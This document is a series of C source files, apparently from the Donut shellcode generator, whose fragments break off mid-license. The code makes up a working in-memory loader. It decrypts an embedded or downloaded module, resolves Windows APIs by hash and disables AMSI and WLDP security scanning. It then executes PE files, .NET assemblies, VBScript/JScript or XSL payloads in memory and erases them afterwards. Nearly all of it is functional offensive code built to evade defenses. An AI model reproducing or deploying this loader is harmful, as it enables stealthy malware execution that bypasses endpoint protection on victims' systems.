126 | imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva); | |
127 | ||
128 | // For each DLL | |
129 | for (;imp->Name!=0; imp++) { | |
130 | name = RVA2VA(PCHAR, cs, imp->Name); | |
131 | ||
132 | DPRINT("Loading %s", name); | |
133 | dll = inst->api.LoadLibraryA(name); | |
134 | ||
135 | // Resolve the API for this library | |
136 | oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk); | |
137 | ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk); | |
138 | ||
139 | // For each API | |
140 | for (;; oft++, ft++) { | |
141 | // No API left? | |
142 | if (oft->u1.AddressOfData == 0) break; | |
143 | ||
144 | PULONG_PTR func = (PULONG_PTR)&ft->u1.Function; | |
145 | ||
146 | // Resolve by ordinal? | |
147 | if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) { | |
148 | *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal)); | |
149 | } else { | |
150 | // Resolve by name | |
151 | ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData); | |
152 | *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name); | |
153 | } | |
154 | } | |
155 | } | |
156 | ||
157 | DPRINT("Applying Relocations"); | |
158 | rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; | |
159 | ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva); | |
160 | ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase; | |
161 | ||
162 | while(ibr->VirtualAddress != 0) { | |
163 | list = (PIMAGE_RELOC)(ibr + 1); | |
164 | ||
165 | while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) { | |
166 | if(list->type == IMAGE_REL_TYPE) { | |
167 | *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs; | |
168 | } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) { | |
169 | DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type); | |
170 | goto pe_cleanup; | |
171 | } | |
172 | list++; | |
173 | } | |
174 | ibr = (PIMAGE_BASE_RELOCATION)list; | |
175 | } | |
176 | ||
177 | if(mod->type == DONUT_MODULE_DLL) { | |
178 | // call exported api? | |
179 | if(mod->method[0] != 0) { | |
180 | DPRINT("Resolving address of %s", (char*)mod->method); | |
181 | ||
182 | rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; | |
183 | ||
184 | if(rva != 0) { | |
185 | exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva); | |
186 | cnt = exp->NumberOfNames; | |
187 | ||
188 | DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt); | |
189 | ||
190 | if(cnt != 0) { | |
191 | adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions); | |
192 | sym = RVA2VA(PDWORD,cs, exp->AddressOfNames); | |
193 | ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals); | |
194 | ||
195 | do { | |
196 | str = RVA2VA(PCHAR, cs, sym[cnt-1]); | |
197 | if(!xstrcmp(str, (char*)mod->method)) { | |
198 | api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]); | |
199 | break; | |
200 | } | |
201 | } while (--cnt); | |
202 | ||
203 | if(api != NULL) { | |
204 | CallApi = inst->api.VirtualAlloc( | |
205 | NULL, | |
206 | sizeof(CALL_API_BIN), | |
207 | MEM_COMMIT | MEM_RESERVE, | |
208 | PAGE_EXECUTE_READWRITE); | |
209 | ||
210 | if(CallApi != NULL) { | |
211 | DPRINT("Calling %s via code stub.", (char*)mod->method); | |
212 | Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN)); | |
213 | CallApi(api, mod->param_cnt, mod->param); | |
214 | DPRINT("Erasing code stub"); | |
215 | Memset(CallApi, 0, sizeof(CALL_API_BIN)); | |
216 | inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE); | |
217 | } | |
218 | } else { | |
219 | DPRINT("Unable to resolve API"); | |
220 | goto pe_cleanup; | |
221 | } | |
222 | } | |
223 | } | |
224 | } else { | |
225 | DPRINT("Executing entrypoint of DLL\n\n"); | |
226 | DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint); | |
227 | DllMain(host, DLL_PROCESS_ATTACH, NULL); | |
228 | } | |
229 | } else { | |
230 | // The problem with executing EXE files: | |
231 | // 1) They use subsystems either GUI or CUI | |
232 | // 2) They call ExitProcess ...will need to review support of this later. | |
233 | DPRINT("Executing entrypoint of EXE\n\n"); | |
234 | Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint); | |
235 | Start(); | |
236 | } | |
237 | pe_cleanup: | |
238 | // if memory allocated | |
239 | if(cs != NULL) { | |
240 | // DPRINT("Erasing %" PRIi32 " bytes of memory at %p", | |
241 | // nt->OptionalHeader.SizeOfImage, cs); | |
242 | // erase from memory (disabled for now) | |
243 | // Memset(cs, 0, nt->OptionalHeader.SizeOfImage); | |
244 | // release | |
245 | DPRINT("Releasing memory"); | |
246 | inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE); | |
247 | } | |
248 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | VOID RunScript(PDONUT_INSTANCE inst) { | |
32 | HRESULT hr; | |
33 | IActiveScriptParse *parser; | |
34 | IActiveScript *engine; | |
35 | MyIActiveScriptSite mas; | |
36 | IActiveScriptSiteVtbl activescript_vtbl; | |
37 | IHostVtbl wscript_vtbl; | |
38 | PDONUT_MODULE mod; | |
39 | PWCHAR script; | |
40 | ULONG64 len; | |
41 | BSTR obj; | |
42 | BOOL disabled; | |
43 | ||
44 | if(inst->type == DONUT_INSTANCE_PIC) { | |
45 | DPRINT("Using module embedded in instance"); | |
46 | mod = (PDONUT_MODULE)&inst->module.x; | |
47 | } else { | |
48 | DPRINT("Loading module from allocated memory"); | |
49 | mod = inst->module.p; | |
50 | } | |
51 | ||
52 | // 1. Allocate memory for unicode format of script | |
53 | script = (PWCHAR)inst->api.VirtualAlloc( | |
54 | NULL, | |
55 | (inst->mod_len + 1) * sizeof(WCHAR), | |
56 | MEM_COMMIT | MEM_RESERVE, | |
57 | PAGE_READWRITE); | |
58 | ||
59 | // 2. Convert string to unicode. | |
60 | if(script != NULL) { | |
61 | // 2. Convert string to unicode. | |
62 | inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data, | |
63 | -1, script, mod->len * sizeof(WCHAR)); | |
64 | ||
65 | // we're using stack memory for the virtual function table | |
66 | mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl; | |
67 | ActiveScript_New(inst, &mas.site); | |
68 | ||
69 | mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl; | |
70 | Host_New(inst, &mas.wscript); | |
71 | ||
72 | mas.siteWnd.lpVtbl = NULL; | |
73 | ||
74 | // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method | |
75 | DPRINT("CoInitializeEx"); | |
76 | hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED); | |
77 | ||
78 | if(hr == S_OK) { | |
79 | // 5. Instantiate the active script engine | |
80 | DPRINT("CoCreateInstance(IID_IActiveScript)"); | |
81 | ||
82 | hr = inst->api.CoCreateInstance( | |
83 | &inst->xCLSID_ScriptLanguage, 0, | |
84 | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, | |
85 | &inst->xIID_IActiveScript, (void **)&engine); | |
86 | ||
87 | if(hr == S_OK) { | |
88 | // 6. Get IActiveScriptParse object from engine | |
89 | DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)"); | |
90 | ||
91 | hr = engine->lpVtbl->QueryInterface( | |
92 | engine, | |
93 | #ifdef _WIN64 | |
94 | &inst->xIID_IActiveScriptParse64, | |
95 | #else | |
96 | &inst->xIID_IActiveScriptParse32, | |
97 | #endif | |
98 | (void **)&parser); | |
99 | ||
100 | if(hr == S_OK) { | |
101 | // 7. Initialize parser | |
102 | DPRINT("IActiveScriptParse::InitNew"); | |
103 | hr = parser->lpVtbl->InitNew(parser); | |
104 | ||
105 | if(hr == S_OK) { | |
106 | // 8. Set custom script interface | |
107 | DPRINT("IActiveScript::SetScriptSite"); | |
108 | mas.wscript.lpEngine = engine; | |
109 | ||
110 | hr = engine->lpVtbl->SetScriptSite( | |
111 | engine, (IActiveScriptSite *)&mas); | |
112 | ||
113 | if(hr == S_OK) { | |
114 | DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript); | |
115 | obj = inst->api.SysAllocString(inst->wscript); | |
116 | hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE); | |
117 | inst->api.SysFreeString(obj); | |
118 | ||
119 | if(hr == S_OK) { | |
120 | // 9. Load script | |
121 | DPRINT("IActiveScriptParse::ParseScriptText"); | |
122 | hr = parser->lpVtbl->ParseScriptText( | |
123 | parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL); | |
124 | ||
125 | if(hr == S_OK) { | |
126 | // 10. Run script | |
127 | DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)"); | |
128 | hr = engine->lpVtbl->SetScriptState( | |
129 | engine, SCRIPTSTATE_CONNECTED); | |
130 | ||
131 | // SetScriptState blocks here | |
132 | } | |
133 | } | |
134 | } | |
135 | } | |
136 | DPRINT("IActiveScriptParse::Release"); | |
137 | parser->lpVtbl->Release(parser); | |
138 | } | |
139 | DPRINT("IActiveScript::Close"); | |
140 | engine->lpVtbl->Close(engine); | |
141 | ||
142 | DPRINT("IActiveScript::Release"); | |
143 | engine->lpVtbl->Release(engine); | |
144 | } | |
145 | } | |
146 | DPRINT("Erasing script from memory"); | |
147 | Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR)); | |
148 | ||
149 | DPRINT("VirtualFree(script)"); | |
150 | inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT); | |
151 | } | |
152 | } | |
153 | ||
154 | #include "activescript.c" | |
155 | #include "wscript.c" |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | VOID RunXSL(PDONUT_INSTANCE inst) { | |
32 | IXMLDOMDocument *pDoc; | |
33 | IXMLDOMNode *pNode; | |
34 | HRESULT hr; | |
35 | PWCHAR xsl_str; | |
36 | VARIANT_BOOL loaded; | |
37 | BSTR res; | |
38 | PDONUT_MODULE mod; | |
39 | ULONG64 len; | |
40 | UCHAR c; | |
41 | ||
42 | if(inst->type == DONUT_INSTANCE_PIC) { | |
43 | DPRINT("Using module embedded in instance"); | |
44 | mod = (PDONUT_MODULE)&inst->module.x; | |
45 | } else { | |
46 | DPRINT("Loading module from allocated memory"); | |
47 | mod = inst->module.p; | |
48 | } | |
49 | ||
50 | // 1. Allocate RW memory for unicode format of script | |
51 | xsl_str = (PWCHAR)inst->api.VirtualAlloc( | |
52 | NULL, | |
53 | (inst->mod_len + 1) * sizeof(WCHAR), | |
54 | MEM_COMMIT | MEM_RESERVE, | |
55 | PAGE_READWRITE); | |
56 | ||
57 | if(xsl_str != NULL) { | |
58 | // 2. Convert string to unicode. | |
59 | inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data, | |
60 | -1, xsl_str, mod->len * sizeof(WCHAR)); | |
61 | ||
62 | // 3. Initialize COM | |
63 | DPRINT("CoInitializeEx"); | |
64 | hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED); | |
65 | ||
66 | if(hr == S_OK) { | |
67 | // 4. Instantiate XMLDOMDocument object | |
68 | DPRINT("CoCreateInstance"); | |
69 | hr = inst->api.CoCreateInstance( | |
70 | &inst->xCLSID_DOMDocument30, | |
71 | NULL, CLSCTX_INPROC_SERVER, | |
72 | &inst->xIID_IXMLDOMDocument, | |
73 | (void**)&pDoc); | |
74 | ||
75 | if(hr == S_OK) { | |
76 | // 5. load XSL file | |
77 | DPRINT("IXMLDOMDocument::loadXML"); | |
78 | hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded); | |
79 | DPRINT("HRESULT: %08lx loaded : %s", | |
80 | hr, loaded ? "TRUE" : "FALSE"); | |
81 | ||
82 | if(hr == S_OK && loaded) { | |
83 | // 6. query node interface | |
84 | DPRINT("IXMLDOMDocument::QueryInterface"); | |
85 | hr = pDoc->lpVtbl->QueryInterface( | |
86 | pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode); | |
87 | ||
88 | if(hr == S_OK) { | |
89 | DPRINT("HRESULT: %08lx", hr); | |
90 | // 7. execute script | |
91 | DPRINT("IXMLDOMDocument::transformNode"); | |
92 | hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res); | |
93 | DPRINT("HRESULT: %08lx", hr); | |
94 | pNode->lpVtbl->Release(pNode); | |
95 | } | |
96 | } | |
97 | pDoc->lpVtbl->Release(pDoc); | |
98 | } | |
99 | DPRINT("CoUninitialize"); | |
100 | inst->api.CoUninitialize(); | |
101 | } | |
102 | DPRINT("Erasing XSL from memory."); | |
103 | Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR)); | |
104 | ||
105 | DPRINT("VirtualFree()"); | |
106 | inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT); | |
107 | } | |
108 | } |
0 | ThreadProc⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "payload.h" | |
32 | ||
33 | DWORD ThreadProc(LPVOID lpParameter) { | |
34 | ULONG i, ofs; | |
35 | ULONG64 sig; | |
36 | PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter; | |
37 | DONUT_ASSEMBLY assembly; | |
38 | PDONUT_MODULE mod; | |
39 | VirtualAlloc_t _VirtualAlloc; | |
40 | VirtualFree_t _VirtualFree; | |
41 | LPVOID pv; | |
42 | ULONG64 hash; | |
43 | BOOL disabled; | |
44 | ||
45 | DPRINT("Maru IV : %" PRIX64, inst->iv); | |
46 | ||
47 | hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)]; | |
48 | DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash); | |
49 | _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv); | |
50 | ||
51 | hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)]; | |
52 | DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash); | |
53 | _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv); | |
54 | ||
55 | if(_VirtualAlloc == NULL || _VirtualFree == NULL) { | |
56 | DPRINT("FAILED!."); | |
57 | return -1; | |
58 | } | |
59 | ||
60 | DPRINT("VirtualAlloc : %p VirtualFree : %p", | |
61 | (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree); | |
62 | ||
63 | DPRINT("Allocating %i bytes of RW memory", inst->len); | |
64 | pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
65 | ||
66 | if(pv == NULL) { | |
67 | DPRINT("Memory allocation failed..."); | |
68 | return -1; | |
69 | } | |
70 | DPRINT("Copying %i bytes of data to memory %p", inst->len, pv); | |
71 | Memcpy(pv, lpParameter, inst->len); | |
72 | inst = (PDONUT_INSTANCE)pv; | |
73 | ||
74 | DPRINT("Zero initializing PDONUT_ASSEMBLY"); | |
75 | Memset(&assembly, 0, sizeof(assembly)); | |
76 | ||
77 | #if !defined(NOCRYPTO) | |
78 | PBYTE inst_data; | |
79 | // load pointer to data just past len + key | |
80 | inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt); | |
81 | ||
82 | DPRINT("Decrypting %li bytes of instance", inst->len); | |
83 | ||
84 | donut_decrypt(inst->key.mk, | |
85 | inst->key.ctr, | |
86 | inst_data, | |
87 | inst->len - offsetof(DONUT_INSTANCE, api_cnt)); | |
88 | ||
89 | DPRINT("Generating hash to verify decryption"); | |
90 | ULONG64 mac = maru(inst->sig, inst->iv); | |
91 | DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac); | |
92 | ||
93 | if(mac != inst->mac) { | |
94 | DPRINT("Decryption of instance failed"); | |
95 | goto erase_memory; | |
96 | } | |
97 | #endif | |
98 | DPRINT("Resolving LoadLibraryA"); | |
99 | ||
100 | inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv); | |
101 | if(inst->api.addr[0] == NULL) return -1; | |
102 | ||
103 | for(i=0; i<inst->dll_cnt; i++) { | |
104 | DPRINT("Loading %s ...", inst->dll_name[i]); | |
105 | inst->api.LoadLibraryA(inst->dll_name[i]); | |
106 | } | |
107 | ||
108 | DPRINT("Resolving %i API", inst->api_cnt); | |
109 | ||
110 | for(i=1; i<inst->api_cnt; i++) { | |
111 | DPRINT("Resolving API address for %016llX", inst->api.hash[i]); | |
112 | ||
113 | inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv); | |
114 | ||
115 | if(inst->api.addr[i] == NULL) { | |
116 | DPRINT("Failed to resolve API"); | |
117 | goto erase_memory; | |
118 | } | |
119 | } | |
120 | ||
121 | if(inst->type == DONUT_INSTANCE_URL) { | |
122 | DPRINT("Instance is URL"); | |
123 | if(!DownloadModule(inst)) goto erase_memory; | |
124 | } | |
125 | ||
126 | if(inst->type == DONUT_INSTANCE_PIC) { | |
127 | DPRINT("Using module embedded in instance"); | |
128 | mod = (PDONUT_MODULE)&inst->module.x; | |
129 | } else { | |
130 | DPRINT("Loading module from allocated memory"); | |
131 | mod = inst->module.p; | |
132 | } | |
133 | ||
134 | // try bypassing AMSI and WLDP? | |
135 | if(inst->bypass != DONUT_BYPASS_SKIP) { | |
136 | // Try to disable AMSI | |
137 | disabled = DisableAMSI(inst); | |
138 | DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED"); | |
139 | if(!disabled && inst->bypass == DONUT_BYPASS_ABORT) | |
140 | goto erase_memory; | |
141 | ||
142 | // Try to disable WLDP | |
143 | disabled = DisableWLDP(inst); | |
144 | DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED"); | |
145 | if(!disabled && inst->bypass == DONUT_BYPASS_ABORT) | |
146 | goto erase_memory; | |
147 | } | |
148 | ||
149 | // unmanaged EXE/DLL? | |
150 | if(mod->type == DONUT_MODULE_DLL || | |
151 | mod->type == DONUT_MODULE_EXE) { | |
152 | RunPE(inst); | |
153 | } else | |
154 | // .NET EXE/DLL? | |
155 | if(mod->type == DONUT_MODULE_NET_DLL || | |
156 | mod->type == DONUT_MODULE_NET_EXE) | |
157 | { | |
158 | if(LoadAssembly(inst, &assembly)) { | |
159 | RunAssembly(inst, &assembly); | |
160 | } | |
161 | FreeAssembly(inst, &assembly); | |
162 | } else | |
163 | // vbs or js? | |
164 | if(mod->type == DONUT_MODULE_VBS || | |
165 | mod->type == DONUT_MODULE_JS) | |
166 | { | |
167 | RunScript(inst); | |
168 | } else | |
169 | // xsl? | |
170 | if(mod->type == DONUT_MODULE_XSL) { | |
171 | RunXSL(inst); | |
172 | } | |
173 | ||
174 | erase_memory: | |
175 | // if module was downloaded | |
176 | if(inst->type == DONUT_INSTANCE_URL) { | |
177 | if(inst->module.p != NULL) { | |
178 | // overwrite memory with zeros | |
179 | Memset(inst->module.p, 0, (DWORD)inst->mod_len); | |
180 | ||
181 | // free memory | |
182 | inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT); | |
183 | inst->module.p = NULL; | |
184 | } | |
185 | } | |
186 | ||
187 | DPRINT("Erasing RW memory for instance"); | |
188 | Memset(inst, 0, inst->len); | |
189 | ||
190 | DPRINT("Releasing RW memory for instance"); | |
191 | _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE); | |
192 | ||
193 | return 0; | |
194 | } | |
195 | ||
196 | #include "http_client.c" // For downloading module | |
197 | ||
198 | #include "inmem_dotnet.c" // .NET assemblies | |
199 | #include "inmem_pe.c" // Unmanaged PE/DLL files | |
200 | #include "inmem_xsl.c" // XSL files | |
201 | #include "inmem_script.c" // VBS/JS files | |
202 | ||
203 | #include "peb.c" // resolve functions in export table | |
204 | ||
205 | #include "bypass.c" // Bypass AMSI and WLDP | |
206 | #include "getpc.c" // code stub to return program counter (always at the end!) | |
207 | ||
208 | // the following code is *only* for development purposes | |
209 | // given an instance file, it will run as if running on a target system | |
210 | // attach a debugger to host process | |
211 | #ifdef DEBUG | |
212 | ||
213 | #include <stdio.h> | |
214 | #include <string.h> | |
215 | #include <stdlib.h> | |
216 | #include <sys/stat.h> | |
217 | ||
218 | int main(int argc, char *argv[]) { | |
219 | FILE *fd; | |
220 | struct stat fs; | |
221 | PDONUT_INSTANCE inst; | |
222 | DWORD old; | |
223 | ||
224 | if(argc != 2) { | |
225 | printf(" [ usage: payload <instance>\n"); | |
226 | return 0; | |
227 | } | |
228 | // get size of instance | |
229 | if(stat(argv[1], &fs) != 0) { | |
230 | printf(" [ unable to obtain size of instance.\n"); | |
231 | return 0; | |
232 | } | |
233 | ||
234 | // zero size? | |
235 | if(fs.st_size == 0) { | |
236 | printf(" [ invalid instance.\n"); | |
237 | return 0; | |
238 | } | |
239 | ||
240 | // try open for reading | |
241 | fd = fopen(argv[1], "rb"); | |
242 | if(fd == NULL) { | |
243 | printf(" [ unable to open %s.\n", argv[1]); | |
244 | return 0; | |
245 | } | |
246 | ||
247 | // allocate memory | |
248 | inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
249 | ||
250 | if(inst != NULL) { | |
251 | fread(inst, 1, fs.st_size, fd); | |
252 | ||
253 | // change protection to PAGE_EXECUTE_READ | |
254 | if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) { | |
255 | printf("Running..."); | |
256 | ||
257 | // run payload with instance | |
258 | ThreadProc(inst); | |
259 | } | |
260 | // deallocate | |
261 | VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE); | |
262 | } | |
263 | fclose(fd); | |
264 | return 0; | |
265 | } | |
266 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
